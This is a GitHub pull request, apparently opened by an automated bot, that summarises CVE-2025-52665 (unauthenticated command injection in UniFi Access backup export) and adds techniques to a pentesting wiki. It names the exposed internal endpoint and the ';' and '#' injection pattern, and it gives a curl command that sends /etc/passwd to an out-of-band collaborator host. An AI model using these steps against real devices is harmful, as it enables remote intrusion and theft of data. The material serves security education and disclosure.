Skip to content

CVE-2025-52665 Unauthenticated RCE in UniFi Access backup/ex... #1545

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

CVE-2025-52665 Unauthenticated RCE in UniFi Access backup/ex... #1545

wants to merge 1 commit into from

Conversation

@carlospolop
Copy link
Collaborator

@carlospolop carlospolop commented Nov 3, 2025

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

  • Blog URL: https://www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000
  • Blog Title: CVE-2025-52665: Unauthenticated RCE in UniFi Access backup/export via dir command injection
  • Suggested Section: Pentesting Web > OS Command Injection (add techniques for terminating/commenting shell pipelines with ';' and '#', and notes on reverse proxy/internal API exposure with 405-method mismatch heuristics)

🎯 Content Summary

Vulnerability: CVE-2025-52665 — unauthenticated remote command execution in UniFi Access (within UniFi OS/UDM SE) caused by an externally exposed reverse proxy on :9780 that forwards to an internal-only backup export API. The API's export routine builds shell commands using attacker-controlled input (dir) without validation/escaping, enabling command injection.

Architecture and code path: The backup workflow uses a higher-level orchestrator ...

🔧 Technical Details

Internal-only route exposure via external proxy: Probe device ports for known internal paths (e.g., /api/ucore/backup/export). A 405 Method Not Allowed on GET suggests the route exists externally and expects another method (here, POST) with a specific JSON body.

Shell injection in orchestrated backups: When an orchestrator forwards an unvalidated path (e.g., dir) to a shell-based export routine, inject shell metacharacters. Use ; to terminate your command and # to comment out the exporter’s trailing tokens (e.g., mktemp/chmod/tar/du) to prevent syntax errors.

Blind RCE confirmation with OOB: For blind execution, exfiltrate a local file (e.g., /etc/passwd) to an OOB endpoint (curl -s --data-binary @/etc/passwd http://<collaborator>/) to verify code execution before attempting a reverse shell.

Schema-assisted ...

🤖 Agent Actions

I analyzed the blog and determined it provides concrete, reusable techniques for OS Command Injection and discovery heuristics behind reverse-proxied internal APIs. This fits best in Pentesting Web > Command Injection.

What I added

  • A new subsection in src/pentesting-web/command-injection.md:

    • Terminate and comment out trailing shell tokens (avoid exporter pipelines): explains why a naive ; injection can fail when the application appends extra tokens (mktemp/chmod/tar/du, etc.), and shows the robust pattern ; ; # to end the attacker’s command and comment out the rest.
    • Practical JSON payload shape demonstrating the technique.
    • Blind RCE confirmation via HTTP OOB with curl --data-binary @/etc/passwd to a collaborator endpoint.
    • Discovery heuristic behind reverse proxies: using 405 Method Not Allowed on GET as a strong signal the route exists and expects a different verb (e.g., POST with JSON) to reach the vulnerable handler.

  • Reference added:

    • Link to the Catchify blog (CVE-2025-52665) in the References section.

Why this location

  • The techniques extend the OS Command Injection page with precise shell pipeline termination/commenting tactics and reverse-proxy method-mismatch heuristics that are broadly applicable beyond UniFi Access.

No other files were changed or created.

This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

📚 Repository Maintenance

  • MD files processed: 907
  • MD files fixed: 1

All .md files have been checked for proper formatting (headers, includes, etc.).

@carlospolop
Copy link
Collaborator Author

carlospolop commented Nov 3, 2025

🔗 Additional Context

Original Blog Post: https://www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000

Content Categories: Based on the analysis, this content was categorized under "Pentesting Web > OS Command Injection (add techniques for terminating/commenting shell pipelines with ';' and '#', and notes on reverse proxy/internal API exposure with 405-method mismatch heuristics)".

Repository Maintenance:

  • MD Files Formatting: 907 files processed (1 files fixed)

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@carlospolop